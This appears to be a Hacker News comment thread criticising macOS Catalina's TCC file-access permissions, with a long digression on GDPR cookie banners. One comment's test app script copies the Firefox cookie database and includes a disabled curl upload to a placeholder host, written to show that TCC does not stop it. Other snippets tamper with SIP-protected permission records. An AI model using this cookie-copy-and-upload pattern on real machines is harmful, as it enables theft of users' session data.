Assuming it's true - I've no reason to think otherwise but I'm not using a Mac at the mo so can't try it - this is fascinating. It has the ring of a quick workaround for something: in desperation we bung in a whole new capability for this, let's hope nobody notices, we'll do it properly in a later release. Is there a better explanation? If it is a grubby workaround, what would it have been a workaround for?
Good security or not, this entire system should not have been rolled out unless/until Apple had a sane UI for handling it. They don't.
I fucking hate it. Programs can write to my user dir and folders within it freely, but god forbid they touch my sacred Downloads, Documents, and Desktop folders! Better ask me first!
It's like it was made by the iOS dev team but also the iOS dev team has never used a computer before.
I had to add ruby to full disk access to get emacs to work, because emacs is launched by a ruby script and it was insane that I couldn't ls my Downloads folder from it.
Things like my complete shell history can be found there.
The average person doesn't need to care whether a file is executable or not.
(You can add individual apps to full disk access but it needs to be done manually for every new app you install.)
I have had the same thought for at least three years now.
Apple has managed to pull itself back in 2019 with the Qualcomm settlement (finally admitting they were dumb enough to start the fight in the first place), the iPhone 11, the Mac Pro, and the MacBook Pro 16". Not perfect, late, slow, but at least they reacted on the hardware side. (And the Apple Store is getting some love too.)
But software is taking a beating, and has been for a few years in a row already, especially on macOS. Swift's adoption and future are also not very clear; it seems sticking to Objective-C for another year would be a safe bet. Catalyst and SwiftUI may be another blow to macOS as well. They may be good, but I have doubts about whether they will be great.
In theory you could make the permission correspond to "everything in ~/ except dotfiles and Library", but that would be more confusing.
That said, the whole thing is a hack. The "proper" solution is/was App Sandbox, where the whole home directory is virtualized, and apps get a whitelist of what they can access rather than a blacklist. Much more secure! Too bad nobody adopted it.
(Oh, and don't forget that basically all older iOS devices contain a local vulnerability which cannot be fixed.)
This is also true of all "real" computers.
"For years", simply opening an app implicitly gave it access to most of the data on your hard drive, regardless of whether you opened or dragged in a particular file.
In Catalina, Apple wanted to restrict this. As a consequence, in the initial release of Catalina, you could drag a file from your desktop into your Terminal, but your Terminal would be unable to access the file. Which of course is terrible UX!
So what Apple did in this update is give back the behavior you're describing: dragging a file into the Terminal implicitly grants the Terminal access. But unlike in old OS's, the Terminal doesn't suddenly get access to most of the other data on your hard drive as well.
Unfortunately, in order to walk that fine line, Apple had to add an extra, undocumented file attribute. And because Apple policy is that anything TCC-related should be SIP-protected, that attribute is protected by SIP and cannot be manually edited. And because a UI for revoking access to individual files would be a complete nightmare, there's no UI pathway either...
Apple's intentions with all of this absolutely make sense. The problem is that good intentions don't matter if the execution is flawed.
Why would this be a complete nightmare? There's no way to override a permission that's been granted to your ancestor - so why shouldn't the OS be able to remove the flag when you remove the permission in Settings? Why shouldn't the OS be able to maintain the invariant between the permissions dialog and the on-disk representation, given that the on-disk representation can only be set by the OS? That's just sad.
You could put it in the individual file's get info pane, but more users open that pane than know what the Terminal is.
This is the kind of setting you'd want to control via either the Terminal (ironically) or a third party app. But Apple has decided only Apple-supplied software with a UI is allowed to control TCC.
I'm replying to my own post many hours later, because something just occurred to me:
There’s no reason the Terminal or a third party shouldn’t be able to remove this attribute. Just restrict adding the attribute!
What happens if you want to revoke a kext? Delete the entry from the SQLite DB? Nah. Guess what: SIP prevents any and all deletions from that DB. You have to disable SIP to revoke a kext's permissions. And because the signature is not a hash but a two-part vendor/product identifier, it's entirely possible for a malicious version of an existing kext to be released that the signature then permits.
As an admin with a security focus, this seems completely backwards to me. I get that Apple doesn't want to make the permitting operation too difficult in the first place, because these are end-users we're talking about, but the lengths they go to in order to prevent permissions from being revoked are downright strange.
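For the curious, the on-disk side of this can be poked at from a root shell with SIP disabled. Note that the database path and the `kext_policy` table/column names below are assumptions based on public write-ups, not anything Apple documents:

```shell
# Sketch only: inspect the kext approval database (macOS, root, SIP disabled).
# Path and schema (kext_policy: team_id, bundle_id, allowed) are assumptions
# from public write-ups; verify against your own system before relying on them.
list_kext_policy() {
    db=/var/db/SystemPolicyConfiguration/KextPolicy
    if [ -r "$db" ] && command -v sqlite3 >/dev/null 2>&1; then
        sqlite3 "$db" 'SELECT team_id, bundle_id, allowed FROM kext_policy;'
        # This is the kind of deletion SIP blocks on a stock system:
        # sqlite3 "$db" "DELETE FROM kext_policy WHERE bundle_id='com.example.kext';"
    else
        echo "KextPolicy DB not readable here (SIP enabled, or not macOS)"
    fi
}
list_kext_policy
```

On a stock system even the read may fail; the point is that revocation means raw SQL against a SIP-protected file rather than anything in the UI.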
Put the access details in the Get Info of the files in Finder.
Citation needed. It is just a list. I don't see the "nightmare".
There are likely many better ways to handle these situations, but I'm not sure I really expect them from Apple these days. The most recent Apple is starting to recognize issues (e.g. the MacBook Pro keyboard), but I doubt the whole organization has caught up.
I think that's just what's happening.
As other commenters have noted, it reeks of a last-minute workaround to close what would otherwise be a high-priority UI bug for the permissions dialogs.
It's not new.
There are few reasons to go to Catalina.
I don't understand why there's no TCC kill switch, like there is for Gatekeeper and SIP. It's needed.
Terminal is a trusted app to me.
Actually, I probably won't be moving to Catalina. I've been a diehard Apple user since I got a G3, but the way Apple is going, their computers are too nerfed. It's like trying to get excited about buying a car from a rental-car trade-in lot.
Security & Privacy -> Privacy -> Full disk access
This is a computer, not a phone.
Oh, wait, Apple's marketing...
In any case, the fact that the Terminal could be allowed to access all the disk has nothing to do with child processes being allowed to access all the disk.
However, there are a lot of potentially sensitive files that could be trivially replaced with modified versions if this tactic works everywhere, e.g. /System/Library/Security/authorization.plist
⇧⌘G in Finder, type in /etc and press enter.
So if I do this "Terminal drop" thing on a plain file (like sudoers) I gain no special powers, Unix perms still apply. So maybe this only does something on directories.
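A way to see this for yourself, if you're on Catalina: inspect the file's extended attributes before and after the drop. The attribute name `com.apple.macl` is what public write-ups report for this mechanism; treat it as an assumption, and the path here is hypothetical:

```shell
# Sketch: inspect extended attributes on a file you've dragged into Terminal.
# com.apple.macl is the TCC-related attribute name reported in public
# write-ups; the file path below is made up for illustration.
f="$HOME/Documents/example.txt"
if command -v xattr >/dev/null 2>&1; then
    xattr -l "$f" 2>/dev/null     # list attributes and their (opaque) values
    # SIP protects the attribute, so manual removal fails on a stock system:
    xattr -d com.apple.macl "$f" 2>/dev/null || echo "removal blocked or attribute absent"
else
    echo "no xattr tool here; this demo is macOS-specific"
fi
```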
Just press cmd-shift-dot.
cd /etc && open .
But it's the implementation that seems deeply flawed: that there's no obvious way to remove the permission afterwards, or even a record of it where you'd expect to look.
There seems to be a reasonable solution, however: as soon as the terminal window gets closed (and perhaps any background processes ended), the permissions get revoked. And even if your terminal process gets killed without cleanup, permissions would be revoked when your terminal app relaunches or your computer restarts.
That could work, right?
Even simpler, if you write a small shell script with a hard-coded path in it that you run occasionally, you expect that script to keep running even across reboots. That means that, _if Terminal.app automatically adds a permission_, that permission has to be fairly permanent.
In both cases, under your suggested solution, both scripts would work when you test them, and then silently break when you close the terminal window.
I do wonder whether Terminal.app should automatically add that permission, though. If, instead of using emacs/pico/nano/vim, you use a GUI app to edit that script, that doesn’t happen, either, does it?
It's confusing. :-(
⇒ this special permission must either apply directly to all command-line tools or always be inherited across fork and/or execve (it cannot require a magic system call, since the command-line tool reading or writing the data might not be Apple-supplied)
I can see how opening this door "just long enough" gets hairy very easily. So, as others suggest, this may have been implemented as a "OK, let's do it this way for now, and try to figure out whether we can do better later".
I'm sure it's not _that_ simple to implement in actuality, but from a back-of-the-napkin design perspective it's not too hard to appreciate.
What if the process forks? What if the process double-forks to become a daemon, and then Terminal quits? Who removes the xattr then when Terminal isn't even running? Does the kernel now remember that and need to do I/O when _exit(2) is called?
What if the process forks and then itself exits? Does the permission get revoked upon the parent process's exit, with the child's access suddenly revoked too? If so, does an already-opened file descriptor still work, or does it become unusable? If the descriptor still works even though the on-disk file no longer carries the permission xattr, would it continue to confer special access when transmitted over a UNIX socket to an unrelated process? Do you instead track the original PGID instead of the PID? Then what if setpgid(2) is called?
What if the system loses power and no one cleans up the permissions? Do you keep a log of files with such xattrs and clean them at next boot? What if at next boot the file system isn't mounted or mounted at a different mount point?
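The detachment problem in the questions above is easy to demonstrate even in plain shell: a backgrounded job whose immediate parent exits gets re-parented to PID 1 (or launchd), so the original launcher has no handle left to clean up after it.

```shell
# Demo: a "double fork" in shell. The subshell backgrounds a job and exits
# immediately, so the job is re-parented away from the launching shell
# (PID $$), which then has no record of it to clean up.
( sleep 30 & echo "$!" > /tmp/detached.pid )   # subshell exits right away
pid=$(cat /tmp/detached.pid)
new_parent=$(ps -o ppid= -p "$pid" | tr -d ' ')
echo "detached process $pid is now a child of $new_parent, not of $$"
kill "$pid" 2>/dev/null                        # tidy up the demo process
```

Terminal is in exactly this position with respect to any daemonized descendant, which is presumably why "revoke on exit" was never going to be simple.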
This is not the Apple I grew up with.
Why do you think this is the case?
Yes, logically, if I drag a file into the Terminal, I want Terminal to be able to access that file.
Should be documented somewhere, probably, but very clearly a positive change.
The Documents folder was not protected from Terminal before Catalina. Now, items in Documents are protected unless you explicitly drag them into Terminal, but there's no way to "re-protect" them.
That is, at worst, users are in the situation they were before Catalina.
It is a good idea done via an undocumented hack.
The tracking has been through signed bookmarks, with no specific place for apps to persist this info. Keeping it in an xattr for ACLs seems like a great solution, and the exact opposite of a “hack”.
Now, the incentives of software vendors—even open source—have changed to include data exfiltration en masse. Off the top of my head:
* Games that scan and upload the file hierarchy of your system.
* Software sync packages that casually provide data to third parties for research (Dropbox).
* Keyloggers embedded in the default operating system (web search in the Windows Start menu; Ubuntu web search; Siri web search).
* The push toward ever greater “telemetry”.
* Automatic background file uploads, like Microsoft defender sample submission.
* Pervasive ingestion of our data by governments.
The greatest threat to our security has become the vendors and government—the very entities whose job it is to protect us.
> Copy something to your clipboard, open a web page, and it can grab it, along with so much more.
Afaik this is not true.
How exactly are these keyloggers?
That's specifically for Windows Start. If Ubuntu or Siri "web searches" are clearly distinguished from OS searches, then of course I'd expect them to send data somewhere.
No, Google, I DIDN'T intend for you to snoop in my Mac ~/Downloads folder - that area is PRIVATE. So in a way it's good for user Privacy, Apple Inc.-aside.
I know there's been third-party macOS apps providing this 'filesystem firewall' functionality for years now, but it's nice to have some of it come from Apple directly.
I think I will eventually move to Linux, I just don't feel private on my own damn computer anymore. I don't trust Apple either. Or I will harden macOS more and more because of this abuse.
I assume Catalina would be the same, but I've never actually used Catalina. (And probably never will at this point.)
Apparently Apple doesn't remember, because they seem intent to make all the exact same mistakes.
Since I'm only hearing about this in a techie article about Terminal, I think it sounds completely different from Vista UAC.
Same with cookie acceptance popups - supposedly this lets the user know the website uses a cookie, blah blah, but in most cases you HAVE to press yes to go forward - so everyone has now been trained to auto-click yes all the time. At this point those popups could say anything and at least 10% of users would still click yes.
I like the other approach. NO popup / warning unless something meaningfully unexpected.
The problem is there are a bunch of warriors on the net and elsewhere who claim things like: users hate cookies and won't accept them, so they need to be warned about them by every website (which can still technically set cookies regardless of any popup). If users don't want cookies they can block them at the browser level - that's how you get actual control, BTW; a scam site may not put up the cookie notice and may still be able to set the cookie.
Meanwhile - no notice required when your ISP tracks your every move AND is the monopoly provider. The internet folks have their priorities totally backwards - so much focus on evil Google it is ridiculous. The reason many people give Google their entire search / email history is that they trust Google more than the Chinese phone folks, the Samsungs, the Comcasts, etc.
Some real actions to improve the net:
We need actual criminal prosecution and responsibility for websites distributing malware, browser exploits, or malicious downloads.
The owner goes down even if it was their ad network; they can then sue the ad network, and if they can recover from them, great - if not, they still pay for picking a crappy ad network. If their webhost was hacked, they still pay for picking a bad webhost; they can then sue the webhost to recover.
We need to ban and criminally prosecute the sale of info by places like ISPs and DMVs - monopoly providers that already have strong paid revenue streams.
Tracking was being targeted, cookies were conflated with tracking (they are, but not really at the level that's being talked about), and some ineffectual legislation was passed to target cookies instead of tracking. It's almost as if the whole process was steered to that point to avoid any useful change with regard to online tracking...
If you think of the wasted effort of a billion warnings/notifications a day, you realize how little attention folks will pay to them; the only way to get on with your life is to tune these warnings out.
SERIOUSLY - can't someone do a study in the EU showing that their constant warnings mean folks have totally tuned them out?
Here's what the GDPR options of a European website look like: https://imgur.com/a/ckOivi7
That "Analytics Advertising Feature" MUST be unchecked by default. Only users that actually want to be tracked are tracked.
Every "tracking feature" (cookies, fingerprinting, IP tracking, whatever) must be hard opt-in, and the website has to provide an option for the user to opt-out if they change their mind.
If a website only use functional cookies (colours, session, login, cart, language) they don't need consent, just disclosure (and it doesn't have to be an ugly cookie bar).
This is the official EU website.
EVERYONE is being trained to click I accept.
They are doing it right.
It is all the non-compliant companies with only the "Accept" button that are training users to click on it. Those cookie bars are not compliant with GDPR at all.
"Here's how the GDPR options of an European website looks like: https://imgur.com/a/ckOivi7 "
False, the EU website has an ugly cookie bar with a button called "I accept" that everyone has been trained to click yes on.
"That "Analytics Advertising Feature" MUST be unchecked by default. Only users that actually want to be tracked are tracked."
False, users can be presented with an accept / reject button on a standard cookie bar, clicking accept can opt them into tracking - please LOOK at the EU website example I provided.
"Every "tracking feature" (cookies, fingerprinting, IP tracking, whatever) must be hard opt-in."
This can be done through an accept button on a website that users have been trained to click yes on. My earlier suggestion stands as well: someone should study how many users actually navigate into these policies for every website they visit to make fine-grained selections, if such options are even available.
"If a website only use functional cookies (colours, session, login, cart, language) they don't need consent, just disclosure (and it doesn't have to be an ugly cookie bar)."
I gave you an example of an ugly cookie bar on an EU website subject to GDPR - I can find many more.
This is the problem with these folks messing the net up. Everyone should do this / shouldn't do that, but no attention to what is actually happening.
I want to be clear: billions of pages are showing "I accept" buttons - some without reject buttons if they are disclosure-only, some with reject buttons that kick you off the site, and some with reject buttons that opt you out of tracking - and users have been trained by the EU alert notices and disclosure-only notices (which generally DO have an "I accept" button) to waste their time clicking "I accept" everywhere.
This is bad for actual user choice, actual privacy.
Making money is not functionality to me. (Also, note that your website doesn't have to make money: I run my personal blog at a monetary loss, just like many other people.)
> The EU law says I have to disclose lots of stuff and get your consent before tracking you. So every website added a disclosure and consent button, and every user clicked on it.
Right, what they didn't realize is that everyone would just make it super annoying in an attempt to lampoon the law instead of actually changing their behavior, because they'd just make usage of their website conditional on it. Hence GDPR, where users can now actually click "no" and not be penalized for it.
- make money via advertising
- make money via advertising that tracks the user
- make money via advertising that tracks the user and hands over that data to a third party
- make money via advertising that tracks the user, hands over that data to a third party, and opens a security hole in doing so
I’m increasingly annoyed as I go down that list, but I might be willing to accept some of the behaviour at the top of it.
The user must opt-in of their own volition, must be able to reject the tracking cookies (or any kind of tracking) and must be able to opt-out later as well.
Btw: Functional cookies (colours, session, login, cart, language) don't need consent, just disclosure (and it doesn't have to be an ugly cookie bar).
Only cookies that are used to track user behavior, and can be traced back to that particular user, are disallowed. So things like Facebook Like buttons would require consent (since Facebook will use the info gained to target you with ads in another context), while basic Google Analytics or similar is fine, as it only presents aggregated data to the site owner and does not leak data cross-site. Some GA features do require consent though (like demographics tracking), as they require Google to cross-reference between sites. You can generally turn these off (I think they are even off by default?).
Note that implementation of the law also differs between EU countries. So a few are more strict. It is up to the national privacy agency to set exact rules.
Most websites made it about cookies, but the law does not contain that language.
> Meanwhile - no notice required when your ISP tracks your every move AND is the monopoly provider.
Yeah, no. Nobody likes their ISP, it's just that it's a lot harder to enact change here.
What I might not want is cookies from OTHER sites like Google being set and/or accessed by non-Google sites. But having worked at web startups, I know firsthand how important google analytics were, so I don’t know.
GDPR allows that, and you don't need consent, only disclosure, and you don't need an ugly cookie-bar.
This is also why if you access a website with a self-signed certificate, the browser will not give you a “yes” button to go through. You have to jump through a few hoops somewhere else (depending on browser) to accept the self-signed certificate, and then you can see the site.
I think this is the right choice!
I think a list of permissions with detailed explanations as to what they mean, and a Yes button, is a better approach.
Although there needs to be an option to disable or even mock certain permissions.
There is also no log that tells you how the app uses the permission. It would be nice if there were a log of each use of a granted permission.
Dropbox, for example, was recently in the news for silently granting itself accessibility permission, and Apple had to update the OS to prevent them from doing it. They still beg users to grant them this, even lying (EDIT: misleading users) on their web page about the purpose of the permission.
[EDITed instead of replying because HN limits the number of posts I can make for whatever reason.]
It's certainly a powerful ability, and I can completely understand not wanting to grant it, but realize that the need is legitimate (and non-malicious) in a lot of cases.
1: The first sentence in Apple’s accessibility API docs is: “Accessible apps help users with disabilities access information and information technology.“ I think they are very clear about the purpose of these, and it’s not “to do cool innovative things missing from the regular API”.
> I think they are very clear about the purpose of these, and it's not "to do cool innovative things missing from the regular API".
The button doesn't say "yes", but at least on FF there's a way to bypass the warning with one or two clicks from the error page itself. I think you might be confusing this with HSTS, where a certificate failure on an HSTS-enabled website will not let users bypass the warning (and for good reason).
The UAC prompt is essentially "sudo" - it grants root to whatever program is running. You can't really implement a more granular permissions system without significant engineering effort, because you need to ensure that granting one permission doesn't result in privilege escalation. For instance, permission to modify the Program Files or Windows directories can be abused to steal permissions from other applications by replacing existing executables with malicious ones.
>Android permission prompts are way better.
Not really comparable, because "regular" Windows programs aren't sandboxed. So they kinda already have all the Android "permissions" (e.g. contacts - they can simply read them off disk). A better comparison would be root, which essentially has the same UX as Windows UAC.
I personally leave it on, it is a nice "free" fail-safe but you be you.
Most machines are effectively single-user, so security boundaries between user accounts are not very useful.
Restricting the freedom of applications is a good thing, for example I don't want steam games to be able to read my email.
And even the casual users in my circle think that the permission jungle on phones or tablets becomes unworkable and opaque after a while. A flood of untrustworthy apps from a commercial store tends to be the larger security threat.
Big Brother knows what's best?
For decades the Mac has trusted the user; what would be different now, other than the company having its largest-ever pro user base? Why assume pro users don't know what they are doing?
Why the turnaround 10 years later? Is OS X now such a popular desktop OS that it's being attacked in a ways that weren't mainstream back then?
-rw-r--r--@ 1 aaaaaaa staff 2571 Sep 15 2017 config~
That file remains read-only to me. What is going on?
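When a file stubbornly stays read-only despite friendly mode bits, there are a few other things worth checking; the `@` suffix in that listing means extended attributes are present. A hedged checklist (the file name is taken from the listing above; the macOS-only commands degrade gracefully elsewhere):

```shell
# Sketch: diagnose a file that stays read-only despite its mode bits.
# The '@' suffix in `ls -l` output means extended attributes are present.
f="config~"                         # the file from the listing above
ls -l "$f" 2>/dev/null              # plain Unix mode bits
command -v xattr >/dev/null 2>&1 && xattr -l "$f" 2>/dev/null
ls -lO "$f" 2>/dev/null             # BSD file flags (macOS); 'uchg' = immutable
ls -le "$f" 2>/dev/null             # ACL entries (macOS), listed under a '+'
# If the 'uchg' flag turns out to be set, this clears it (may need sudo):
# chflags nouchg "$f"
```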
Isn't that like a Vim backup file? Or that's the copy you renamed?
I had an Xcode project sitting in a folder on the Desktop - a small utility that I modify frequently.
After the Catalina upgrade, compilation of that project stopped working.
Xcode started complaining "file is inaccessible" or something like that. The peculiar thing is that you can still open that file from the IDE via Open Containing Folder / Finder.
And Xcode provides absolutely no clue as to why it cannot access the project's files...
Where does a road paved with such good intentions lead?
Plus, if drag-and-drop somehow enables Terminal to get that file permission, then I guess one of two things: (a) Terminal is special-cased to be the only app capable of gaining that kind of permission from a drag-and-drop, in which case, well, why didn't they just grant it the permission from the start; or (b) it can be exploited by any other app to gain similar permissions on drag-and-drop of a file onto the app... ?
How is this our fault?
This is where I closed the article.
1) I granted full disk access to iTerm2. Later I removed it in the UI, and I can still do everything in iTerm.
2) I have "Documents" access granted to a Java app. I tried opening and saving files in various locations and didn't notice any restrictions other than my ordinary UNIX user's.
3) I created an app bundle containing a plain shell script that reads my firefox cookie file and curls the file somewhere. This app runs just fine with no prompt whatsoever.
Am I being stupid here or what's up?
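For anyone who wants to reproduce test (3): the bundle layout needed is minimal. All names below are made up, and the upload step is deliberately left commented out:

```shell
# Sketch: a minimal .app bundle wrapping a plain shell script, as in test (3).
# All names are hypothetical; the exfiltration line is deliberately inert.
mkdir -p CookieTest.app/Contents/MacOS
cat > CookieTest.app/Contents/MacOS/CookieTest <<'EOF'
#!/bin/sh
# Copy a file TCC should arguably be guarding...
cp "$HOME"/Library/Application\ Support/Firefox/Profiles/*/cookies.sqlite /tmp/ 2>/dev/null
# ...and this is where a malicious app would ship it off (left disabled):
# curl -T /tmp/cookies.sqlite https://example.invalid/upload
EOF
chmod +x CookieTest.app/Contents/MacOS/CookieTest
# open CookieTest.app    # per the test above, this ran with no TCC prompt
```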
First of all, I can see how this functionality is oriented towards the average Joe, not developers, sysadmins or hackers in general.
This helps the user, to an extent, protect their assets from malware or accidents.
Also, it is undocumented, probably for a reason: this could be an early version that will be evolved and announced once they feel comfortable.
They are unsystematically doing whatever the hell they like, without regard for consistency or compatibility.
Did you just change the permissions on that file? That’s against the rules isn’t it?
I feel like that was the pinnacle of Apple hardware/software.
(I have very strong feelings about individual OS X versions)